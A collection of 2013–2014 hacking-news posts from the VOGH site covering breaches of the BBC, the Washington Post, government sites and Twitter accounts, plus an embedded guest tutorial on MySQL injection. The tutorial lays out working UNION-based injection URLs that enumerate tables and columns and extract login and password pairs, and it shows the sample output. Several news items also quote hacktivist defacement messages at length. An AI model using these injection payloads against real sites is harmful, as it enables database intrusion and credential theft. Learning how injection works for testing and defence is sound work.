BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access

BBC Server Compromised! Russian Hackers Hacked Into FTP & Tried to Sell Unauthorized Access on The X-Mass Evening 

Earlier we have seen world renowned media houses like CNN, NBC, Fox News, Washington Post, NY Times, NDTV and so on have fallen victim to hackers and cyber criminals. Now it was the turn for world’s largest and oldest broadcaster -British Broadcasting Corporation, widely known to us as BBC. Sources revealed that cyber criminals have managed to breach the security system of BBC and secretly took over a computer server at the BBC and then launched a Christmas Day campaign to convince other cyber criminals to pay him for access to the system. The attack was first identified by a cyber security firm named Hold Security LLC, in Milwaukee that monitors underground cyber crime forums in search of stolen information. However, it is still not clear whether the hacker stole any information or data or caused any damage to the site. In conversation with press Alex Holden, founder and Chief Information Security Officer of Hold Security told -"So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC.” So far the identity of hacker has not been confirmed, but the firm researchers observed a notorious Russian hacker known by the monikers "HASH" and "Rev0lver," attempting to sell access to the BBC server on December 25. However, BBC's security team managed to secure the site on Saturday, claims a person close to clean up efforts. One of the BBC spokesman refused to comment on the issue, he said, “We do not comment on security issues.” On the other hand, Justin Clarke, a principal consultant for the cyber security firm Cylance, said that while "accessing that server establishes a foothold within BBC's network which may allow an attacker to pivot and gain further access to internal BBC resources.” So far Hold Security researchers have found no evidence the conversations led to a deal or that data was stolen from the BBC. But we all know that  ftp systems are typically used to manage the transfer of large data files over the Internet. That's why the chances of data breach cant not be denied at this time. For updates on this piece of news and other hot information of the cyber & tech world stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href="> BBC Server Compromised! Russian Hackers Broke Into FTP & Tried to Sell Unauthorized Access "https://www.voiceofgreyhat.com/2014/01/bbc-ftp-server-hacked-by-russian-hackers.html?m=0</a>

Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS

Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS -Said Dr41DeY

Couple of weeks ago, I have talked about the vulnerability of Cartoon Network official website, today I am going to speak about two more big fish who are posing serious security holes in their official websites. Lets not waste time while stretching the preface and come directly to the story -it's the hacker who has recently made his name for some big hacks, has back again. 

Many of you are right, I am talking about 'Dr41DeY' because he is the guy who found vulnerability in the official website of Skype Shop and National Geographic Channel Germany (Nat Geo). Both Nat Geo and Skype have non persistent cross site scripting vulnerability also known as XSS vulnerability in their website. We have already informed this issue to concerning authority and webmaster to avoid misfortune. As expected, while writing this Skype have taken this issue seriously and fixed their loopholes immediately. Still for proof- above I have shared the screenshots with our readers, as evidence of the XSS hole. But unlike Skype Shop, Nat Geo yet not responded, so the vulnerability still exist on their portal. Hopefully they will take appropriate steps with out doing more delay. For updates in this story and also other hot cyber issues, just stay tuned with VOGH.  Before concluding, I would like to remind you that- in 2012 an Indian hacker named Akshay has found XSS holes in the official website of National Geographic. Again after a year, Dr41DeY found another Nat GEO site vulnerable to XSS, that definitely arises a doubt about the security concern of one of the world's leading satellite television channel featuring documentaries with factual content involving nature, science, culture, and history, plus some reality and pseudo-scientific entertainment programming. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Skype Shop & National Geographic Germany (Nat Geo) Vulnerable to XSS"https://www.voiceofgreyhat.com/2013/12/skype-shop-nat-geo-vulnerable-to-xss.html?m=0</a>

Taith North Wales Transport & Travel Planning of UK Govt Hacked By Pakistani Hacker

Taith North Wales Transport & Travel Planning (Govt of UK), Few Other High Profile Websites Hacked By 'KHAN' (Pakistani Hacker)

A hacker from Pakistan going by the nick name of 'KHAN' has targeted a several high valued website of United Kingdom. The cyber attack happened few days ago where 'Khan' has hacked into the websites of Taith North Wales Transport and Travel Planning of UK Government. Taith is a joint committee of six county authorities from North Wales that handles transport and travel planning.

Sources revealed that the hacker belongs from Italy has managed to gain access into one the server of UK govt, and thus he successfully hack and change the index page with customized message saying- "today i am again with same message uk goverment deciding Ban Hijab for muslim womens what the hell is this! when your womens wear underware and come out of home beaches, road, you said this is freedom ? this is no problem ? but when our ladies , sisters , mothers wear hijab you said this is problem . so you call this justice ? i will fight for our right like a legend till i die .. We Want Freedom For Our Religion. You can kill us but cant kill our idea!" The hacker also claimed that not only defacement, but also he managed to breach the database of  the website. As soon as the security breach get spotted the authorities of Taith North Wales Transport Dept, took immediate steps and restored the site. While the time of writing this news, Taith Transportation portal has come back to online to its normal format. Also in his deface page 'Khan' took the responsibility of intrusion against Customs of Russia' official website. This slew of hacking rampage also affected several other high profile website of UK such as Hotel Black Boy Inn, Buckley Industry, Groes News, Spirit Models, Livetech, ByteBack Training & few more.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Taith North Wales Transport & Travel Planning of UK Govt Hacked By Pakistani Hacker"https://www.voiceofgreyhat.com/2013/12/taith-govt-uk-hacked-by-khan.html?m=0</a>

The Washington Post Server Breached! Chinese Hackers Apprehend For This Cyber Attack

The Washington Post Server Hacked! Suspected That Chinese Hackers Are Behind This Cyber Attack 

Last week the story of Chinese eavesdropping on European ministries and diplomats at G20 summit draws the attention of the entire cyber world and made headlines. Yet again another breathtaking issue came in-front where also China found responsible for security breach that effected The Washington Post - the most widely circulated newspaper published in Washington, D.C. Sources reveled that hackers broke into The Washington Post’s servers and gained access to employee user names and passwords. Mandiant, a cyber security contractor that monitors The Washington Post’s networks, said the intrusion was of relatively short duration. The extent of the loss of company data was not immediately clear, still the matter of relief is that the company passwords are stored in encrypted form, hackers in some cases have shown the ability to decode such information. although to avoid any further mishap Washington Post have planned to ask all employees to change their user names and passwords on the assumption that many or all of them may have been compromised. Officials at Washington Post said that they saw no evidence that subscriber information, such as credit cards or home addresses, was accessed by the hackers. Nor was there any sign that the hackers had gained access to The Post’s publishing system, e-mails or sensitive personal information of employees, such as their Social Security numbers. Post officials found that this hack is more-recent than the 2011 one. They also said, began with an intrusion into a server used by The Post’s foreign staff but eventually spread to other company servers before being discovered. “This is an ongoing investigation, but we believe it was a few days at most,” said Post spokeswoman Kris Coratti. 

China not only targeted Washington Post,  If you look at the story of major cyber attacks of this year we will find that the name of China has been involved several times for engaging cyber attacks against several high profile news organization of U.S. including New York Times, NBC and so on. So far Chinese Government have not responded to this issue, also none of Chinese hacker community take the responsibility of this breach. For upcoming updates on this story stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">The Washington Post Server Breached! Chinese Hackers Apprehend For This Cyber Attack "https://www.voiceofgreyhat.com/2013/12/washington-post-hacked-by-chinese-hackers.html?m=0</a>

Security Breach Invaded 8,500 Recipients of Unemployment Insurance Agency Michigan (UIA)

Michigan Unemployment Insurance Agency (UIA) Hacked! 8,500 Recipients Personal Data Leaked

A major security breach has invaded Unemployment Insurance Agency of Michigan, widely known as UIA. Sources revealed that the attack was placed in between mid of July to mid of September which affected more than 8,500 unemployment insurance recipients in Michigan with leak of social security numbers, bank account numbers, passwords, phone numbers & few other sensitive data. This security breach was first detected Sept. 17 by contractor JP Morgan Chase. In his reaction the director of the Unemployment Insurance Agency, Shaun Thomas said -“The UIA is deeply concerned about this incident.” But due to some untold reason state official were not notified until this December first week. Dan Lohrmann, the state’s chief security officer in the Department of Technology, Management and Budget, said he has “worked closely with JP Morgan Chase to share our concern about the delayed notification and to ensure that the state receives immediate notice of future problems. “We work around the clock to keep citizen information and data protected, and I feel confident that everyone involved in this event understands the importance of protecting personal information.” Chase, which handles the debit cards Michigan uses to pay unemployment insurance benefits to some recipients, said those who accessed the bank’s website between mid-July and mid-September may have been affected. The 8,500 claimants in Michigan are among about 465,000 cardholders nationwide who may have been affected, the bank said. So far the identity of the hackers & their reasons behind this attack is not been identified, but Chase has notified law enforcement and both the bank and the state will be notifying claimants whose information was potentially compromised. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Security Breach Invaded 8,500 Recipients of Unemployment Insurance Agency Michigan (UIA) "https://www.voiceofgreyhat.com/2013/12/unemployment-insurance-agency-hacked.html?m=0</a>

Cartoon Network (CN) Official Website is Vulnerable to XSS Attack

XSS Vulnerability Found in Cartoon Network's (CN) Official Website By Dr41DeY 

After the successful breach of 'DY365 TV' yet again the hacker going by the name of Dr41DeY from Nigerian Cyber Army targeted another TV network. Guess what, this time he caught even a bigger fish. Unlike defacement or breach this time the hacker did something what it called ethical or can be categorized in white-hat list. Okey now without pulling the intro more longer lets directly come to the story -and that is the official website of Cartoon Network is vulnerable of cross site scripting attack also known as XSS attack. Cartoon Network mostly known as CN is the worlds leader in broadcasting  animated programming, ranging from action to animated comedy & many more. This satellite channel is the most preferred channel for the children and teenagers between the ages of 7 to 5 among the whole of the world. So it is quit indisputable that the official website of Cartoon Network (CN) is indeed a valuable website which have large number of traffic everyday. But it is unclear that being such a big and popular brand name, why CN committed such a massacre while leaving XSS vulnerability in their official portal. Dr41DeY shared with VOGH, that the search box in the home page of CN poses non persistent XSS vulnerability. The above screen shots was taken as a proof of the story. I on behalf of Team VOGH has already contacted CN authorities, and knocked them about this issue. Hopefully they will take appropriate steps with out doing any further delay. For updates in this story and also other hot cyber issues, just stay tuned with VOGH.  

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Cartoon Network (CN) Official Website is Vulnerable to XSS Attack "https://www.voiceofgreyhat.com/2013/12/cartoonnetworkvulnerable2-xss.html?m=0</a>

Pakistan People's Party Official Website Hacked By Dr41DeY (Nigerian Cyber Army)

Pakistan People's Party (PPP) Official Website Hacked By Dr41DeY (Nigerian Cyber Army)

A new young hacker going by the alias name of Dr41DeY, from a newly formed hackers community named Nigerian Cyber Army target a high profile website of Pakistan and blown the official website of Pakistan People's Party (PPP). As per relevant sources; this cyber attack taken place on November 30th where the hacker has managed to gain access on the server of PPP and after gaining access he deleted important files from the server and changed the site index page. In other word has defaced People's Party index page with the logo of Nigerian Cyber Army while leaving few warning to the webmaster. After the hack, the hacker has created what it called a image archive to prove the defacement. People's Party has not yet officially responded to this issue, but immediately after the hack taken place, PPP authorities have sent their site offline. And after few years the index page get restored while displaying the message of  "Website is under Development, it will come live soon. Sorry for inconvenience". By the time of writing this story, the website of PPP remained under construction. 

Brief About Pakistan People's Party (PPP):- The Pakistan Peoples Party (PPP) is a mainstream political party in Pakistan. It is led by "life chairperson" Benazir Bhutto. The Pakistan Peoples Party Parliamentarians (PPPP) is a party formed in 2002 by the PPP for the purpose of complying with electoral rules governing Pakistani parties. At the last legislative elections, 20 October 2002, the party won 25.8 % of the popular vote and 71 out of 272 elected members, thus gaining the second-largest number of seats in the Parliament of Pakistan. The party was founded in 1967, on November 30th and Zulfikar Ali Bhutto became its first chairman. The party creed is: "Islam is our faith; democracy is our politics; socialism is our economy; all power to the people."

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Pakistan People's Party Official Website Hacked By Dr41DeY (Nigerian Cyber Army)"https://www.voiceofgreyhat.com/2013/12/pakistan-peoples-party-website-hacked.html?m=0</a>

We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)

We Are The Best Tool For Web Application Security (Discovering The Infamous Sql-injection Technique) 

Today I am proudly sharing an article made by Mr. Rafael Souza one of the great admirer and fan of VOGH has gladly shared his brilliant research paper on SQL-Injection (MySql) with us. Rafael is a very passionate on cyber security domain and he is keenly involved with GreyHat Community and Maintainer design of Brazilian Backtrack Team. So without wasting time lets go and see what Rafael has for us:- 

Discover The Infamous MySQL Injection Technique 

                                                                                        

ABSTRACT:

It is known that computers and software are developed and designed by humans, human error is a reflection of a mental response to a particular activity. Did you know that numerous inventions and discoveries are due to misconceptions?

There are levels of human performance based on the behavior of mental response , explaining in a more comprehensive, we humans tend to err , and due to this reason we are the largest tool to find these errors , even pos software for analysis and farredura vulnerabilities were unimproved by us.

                                                                                                       
Understand the technique MySQL Injection: 

One of the best known techniques of fraud by web developers is the SQL Injection. It is the manipulation of a SQL statement using the variables who make up the parameters received by a server-side script, is a type of security threat that takes advantage of flaws in systems that interact with databases via SQL. SQL injection occurs when the attacker can insert a series of SQL statements within a query (query) by manipulating the input data for an application. 

STEP BY STEP

 

(Figure 1) Detecting

Searching Column number (s): We will test earlier in error, then no error may be said to find.

(Figure 2) SQL Error 

Host Information,

Version of MySQL system used on the server.

(Figure 3) Host Information

(Figure 4) Location of the Files

Current database connection used between the "input" to the MySQL system

(Figure 5) Users of MySQL

(Figure 6) Current Time

Brute Force or Shooting

This happens in versions below 5.x.y

(Figure 7) Testing

Dump: This happens in versions up 5.x.y [ 1º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(table_name) from information_schema.tables where table_schema=database()--

usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you
or
Unknown column 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios,rafael,fontes,souza,greyhat,hackers,test,ownz,you' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 0,1--

CHARACTER_SETS
or
Unknown column 'CHARACTER_SETS' in 'where clause'
ou
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'CHARACTER_SETS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 1,2--

COLLATIONS
or
Unknown column 'COLLATIONS' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'COLLATIONS' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 16,17--

usuarios
or
Unknown column 'usuarios' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'usuarios' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(table_name) from information_schema.tables limit 17,18--

rafael
or
Unknown column 'rafael' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Searching Column (s) of a given table

* Brute Force / Shooting

This happens in versions below 5.x.y

http://[site]/query.php?string= 1 union all select 1,2,3,4,nome from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,churros from usuarios--

Unknown column 'rafael1' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,login from usuarios--

_Rafa_
or
Unknown column '_Rafa_' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,passwd from usuarios--

rafael1337
or
Unknown column 'rafael1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'rafael1337' at line 1

=--------------------------=--------------------------=--------------------------=--------------------------=

Dump

This happens in versions up 5.x.y [ 1º Method ]

"usuarios" hexadecimal -> "7573756172696f73"

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(column_name) from information_schema.columns where table_name=0x7573756172696f73--

login,passwd,id,texto
or
Unknown column 'login,passwd,id,texto' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login,passwd,id,texto' at line 1

<>------------------------<>-------------------------<>--------------------------<>

[ 2º Method ]

"usuarios" decimal -> "117,115,117,97,114,105,111,115"

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 0,1--

login
or
Unknown column 'login' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'login' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 1,2--

passwd
or
Unknown column 'passwd' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'passwd' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 2,3--

id
or
Unknown column 'id' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'id' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(column_name) from information_schema.columns where table_name=char(117,115,117,97,114,105,111,115) limit 3,4--

texto
or
Unknown column 'text' in 'where clause'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'text' at line 1

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Extracting data from the columns of a given table

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337
or
Unknown column '_Rafa_ : fontes1337' in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,group_concat(login,0x20,0x3a,0x20,senha) from usuarios--

_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec
or
Unknown column '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec ‘in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Rafa_ : fontes1337,l337_ : 3_l33t,greyhats : fontes,hackers : mitnick,green : rha_infosec' at line 1

=--------------------------=

http://[site]/query.php?string= 1 union all select 1,2,3,4,concat_ws(0x20,0x3a,0x20,login,senha) from usuarios--

_RHA_ : infosec1337
or
Unknown column '_RHA_ : infosec1337‘ in 'field list'
or
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '_Mlk_ : gremio1903' at line 1

=--------------------------=

Concat
group_concat() => Search all you want with ascii caracters

concat() => search what you want with ascii caracters

concat_ws() => unite

Hexadecimal
0x3a => :
0x20 => space
0x2d => -
0x2b => +

Readers, this article is for educational purposes only, could continue explaining how to exploit web sites, but that is not my intention.

It is known that the impact of the change may provide unauthorized access to a restricted area, being imperceptible to the eye of an inexperienced developer, it may also allow the deletion of a table, compromising the entire application, among other features. So I want to emphasize that this paper is for security researcher and developers to beware and test your code.

CONCLUSION

Many companies are providing important information on its website and database, information is the most valuable asset is intangible, the question is how developers are dealing with this huge responsibility?

The challenge is to develop increasingly innovative sites, coupled with mechanisms that will provide security to users.

The purpose of this paper is to present what is SQL Injection, how applications are explored and techniques for testing by allowing the developer to customize a system more robust and understand the vulnerability.

**********

I hope you all will enjoy the above article, as I did. On behalf of entire VOGH Team I am sincerely thanking Mr. Rafael Souza for his remarkable contribution. 

To get more of such exclusive research papers along with all kind of breaking cyber updates across the globe just stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">We Are The Best Tool For Web Application Security (Discovering Infamous Sql-i Technique)"https://www.voiceofgreyhat.com/2013/12/we-are-best-tool-for-web-application.html?m=0</a>

Customs Services of Ukraine Govt Hacked By Anonymous, 1 GB of Classified Data Stolen

Customs Services of Ukraine Government Hacked By Anonymous, 1 GB of Classified Data Stolen

Anonymous -the world largest hacker community, also known as the infamous hacktivist who is widely known for engaging massive cyber attack against several governments strikes again. This time the target was Ukraine Government. According to multiple relevant sources of Anonymous it has been confirmed that the hackers have launched what it called an organised attack against different servers belongs to Ukrainian Government. During this round of cyber attack the main target was the Customs department of Ukraine. In their press release Anonymous took responsibility of performing onerous attack on CUSTOMS.GOV.UA, and caused what it called a voluminous data leak from it. This is the server that is responsible for the Odessa customs and handling of goods in the region of the Danube and Black Sea. From the press release we came to know that voluble of the stolen data is almost of 1GB, which is pointing a finger of sensational information of illegal operations of oil and gas, corruption schemes, bribes, cargo operations and so on. 

Most of the information is reported on the site, concerning the former head of the State Customs Service of Ukraine Ihor Kaletnik , who left the post after being elected deputy to in 2012 by Communist Party of Ukraine. Now Kaletnyk is the Deputy Speaker

Official Release of Anonymous: -

"Ukraine GOV hacked. CUSTOMS of UKRAINE customs.gov.ua MASSIVE Docs leak.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + 

Greetings Our Fellow lulz. + 

+ 

Time to anchore Our ​​Marie Lulzize in an unstable Harbour + of Odessa in Ukraine. This Great Day We present you 1GB of raw + Data from one of the Servers of CUSTOMS.GOV.UA. To be pricise Ukraine Customs in + Black Sea and Danube - marine Customs. + Inside you Will Find lulz much related to Illegal Operations with + Oil and gas, corruption and Schemes Also much of good eddible Intel + All related to corruption in Ukraine Government controlled marine + Cargo Operations, Bribes and kickbacks gov. + Much of the Inside of the package is related to Ukraine + Former Chief Customs - Ihor Kaletnyk WHO is an active FSB operative + Russian enforcing rules of Engagement in Ukraine. + Also alot of Offshore moneylaundering by this persona and Other Government + Crooks. We undrstand that oil is money and money is power. + But They just do not Realize That one Day + shit happens and this shit pours from Big A Greedy right into Their throats.  + Sneak Peak of 64 Documents ..."

The hacker community has posted all the leaked information on an image archive and made that available for public. The 1 GB of the stolen data has also been made public in three different archive links. 

But on other hand the Ukrainian Government Officials denied the entire issue, according to the spokes man of government "Custom server can not be compromised. Therefore, as at customs.gov.ua a web server. Other documents, as far as I know, this server is not stored."  He also said that "Those documents that have posted allegedly crackers were not extracted from the server to the customs. In this I am 100%. Let me explain. Please note, most of the documents photographed, that is, it is done the person who had physical access to them, perhaps even temporary. Given that the documents from different regions of Ukraine, then they could meet only in the State Customs Service (MinDohodov) or law-enforcement agencies." 

While talking about this recent breach, we would like to remind you that couple of years ago, another infamous hacker community going by the name of Kosovo Hackers Security (KHS) targeted Ukraine govt. That time KHS have successfully penetrated the official website of Ukraine Police, Gazeta.ua (Ukraine Largest News Portal) and many more high profile sites. Now this hack of Anonymous is again another big attack which caused a serious damage to the Ukrainian cyber space. For updates on this hack and also all the other cyber updates stay tuned with VOGH. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Customs Services of Ukraine Govt Hacked By Anonymous, 1 GB of Classified Data Stolen"https://www.voiceofgreyhat.com/2013/11/customs-services-ukraine-hacked-by-anonymous.html?m=0</a>

E!Online Official Twitter Account Hijacked By Syrian Electronic Army (#twithackery)

E!Online Official Twitter Account Hijacked By Syrian Electronic Army (#twithackery) Fake Tweet Claimed Justin Bieber is Gay

The massive ongoing twitter hijacking also known as twithackery carried by carried by the infamous pro-Assad group of hackers known as the Syrian Electronic Army targeted another high profile twitter account. After the successful hijack of three high profile twitter account of CBS news followed by the hack of BBC and the Associated Press twitter account, now Syrian Electronic Army aka SEA have caught another big fish  that is E! Online -one of the leading resource of entertainment and celebrity gossip news. The official twitter account of E!Online that has over five million followers fallen victim to these dangerous hacker collective group. As per several legitimate sources this high valued twitter account was hacked on Saturday afternoon and subsequently posted several false tweets about a few celebrities, most specifically Justin Bieber. After the successful hijack, exactly like earlier the hacker group started tweeting false message. Among those One tweet read, “Exclusive: Justin Bieber to E!Online: I’m a gay,” followed by a shortlink.  Another read, “Exclusive: Selena Gomez tells E! she will fully supporting Justin in his coming out” [sic], also followed by a shortlink.  (Selena Gomez was Bieber’s girlfriend up until recently).  And another made reference to Angelina Jolie blaming Jordan for “the Syrian refugees’ atrocious conditions.” Here is screen capture of those fake tweets:- 

After this mishap security experts have figured out that many of those links associated with the above fake tweets redirecting users to malicious webpages. So users were urged not to click on the links. Not only the official twitter account, but also the hacking group also managed to infiltrate the E!’s text messaging system, sending hundreds of thousands of subscribers similar messages including an obscene message relating to President Barack Obama. 

While talking about twitter hacking, widely known as #twithackery; we would like to remind you the following names, WWE champion John Cena, Star Rita Ora, Justin Bieber, Teyana Taylor,American pop singer Kesha, NBC News, Fox News Politics, USAToday, Lady Gaga’s Twitter Account, Anders Breivik, Mahesh Bhatt, Huffington Post & CBS; these are the famous names who have fallen victim to twithackery before E!Online. In the wake of all the recent cyberattacks on news organizations, Twitter has warned media accounts that they will continue to be targets of hackers, and has advised them to take all appropriate steps to further secure their Twitter accounts. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">E!Online Official Twitter Account Hijacked By Syrian Electronic Army (#twithackery) "https://www.voiceofgreyhat.com/2013/05/twithackery-EOnline-twitter-hacked-by-SEA.html?m=0</a>

#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Muslim Liberation Army (MLA) & Kosova Hacker Security (KHS) Joins Operation Isreal & Hacked Several Israeli Govt Websites & Leaked Sensitive Data

Operation Israel the devastating hacking rampage continues and becoming more and more venturesome for the Israeli cyber space. In the last week of March, it was dangerous hacker collective group Anonymous who called the operation also dubbed #OpIsrael, where the hacker group vows to erase Israel from the Internet. And as expected this is happening, the first quake came from Turkey-based Marxist hacker group named RedHack and Anonymous, where they targeted Israeli intelligence agency Mossad and breached personal data of 35K officials. Operation Israel, was not among those typical rampage of Anonymous, here Anon called other hackers from different part of of the spectrum to join. First it was RedHack who responded, and now the Muslim Liberation Army lead by Pakistani hacker Hitcher, along with Kosova Hacker's Security & few other Albanian hacker's community joined #OpIsrael. 

Yesterday it was Hitcher from Muslim Liberation Army (MLA) who targeted Israel’s Ministry of National Infrastructures (MNI). The hacker managed to breach the server of Israel Ministry and defaced several website belongs to Israel Ministry of Infrastructures. The attack took place at yesterday late night, but still at the time of writing the news, several Israel MNI websites are not performing. Not only MNI, as per sources several other high profile and Israeli government sites have also been taken down in this round attack. While covering this hack of Hitcher, we must have to recap the previous hack of  Pakistan hackers who are constantly against Israel (for Gaza issue) causing massive cyber attack against leading IT industry of Israel and other high profile Israeli sites. Just a couple of months ago, the world seen what it call the black day in the history if Israeli cyber space where another Pak hackers community hacked the main domain controller of Israel, which causes a massive hack against almost all the big Israeli sites such as government, MSN, Bing, Live, Skype, Microsoft Store, BBC, CNN, Coca-Colla, XBOX, Windows, Intel & many more. 

During the hacking rampage, Hitcher delivered the following message - 

“We are outraged at the Palestine present condition and the Illegal occupation of Palestinian Land By the Zionist Israelis. This attack is in response to the Injustice against the Palestinian people. Occupied Palestinian land under the guise of residential settlements are being increased. Palestinians are deprived of their basic human rights. International Aid workers are stopped from providing any humanitarian assistance to the people. The International community and media is not allowed to bring facts to world as due to strict restrictions” 

On the other hand, Kosova Hacker's Security along with few other Albanian hacker's community performed, what it called a demolishing cyber attack, that caused huge damage to the Israeli cyber space. During the attack Kosova Hacker's Security also known as KHS hit several important Israeli government & commercial websites such as  Civil Aviation Authority, Israel Police, Ministry of Health and many more. KHS caused damage to those websites, not by doing defacement by causing data leak. KHS hacked and exposed thousands of sensitive data, including full name, email-id, passwords and other confidential information of those said Israeli websites. All those leaked data have been made available by the hackers in a website called pentagoncrew.com All those hacks have been performed under the banner of Operation Israel also dubbed #OpIsrael for the cause of Gaza. For instance, here we can recap the hack of Kosova Hackers Security (KHS) where they hacked and exposed personal data of 35,000 Israeli people. 

At conclusion, we want to say that, at the time when Anonymous first called Operation Israel, Israeli government presumed that they have taken the threat very seriously and from the government end it has been  stated that they will take almost every steps to avoid any kind of disaster. Now after observing the above scenario it is clear that Israel Government have completely failed to protect their cyber space, in spite of having precaution. Also another thing get spot light, that is different hackers community have already came under a single shade in order to hit Israel against Gaza & Palestine issue. Today is the historical 7th April, I mean the day which Anonymous promised to erase Israel from the Internet. So the clock is running, lets see what more is about to come.  for the time stay tuned with VOGH to get all the latest update on this story and also other cyber issues. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">#OpIsrael Continues: KHS & MLA Hacked Several Israeli Govt Websites & Leaked Sensitive Data"https://www.voiceofgreyhat.com/2013/04/OpIsrael-Continues-KHS-MLA-Hacked-Israeli-Sites.html?m=0</a>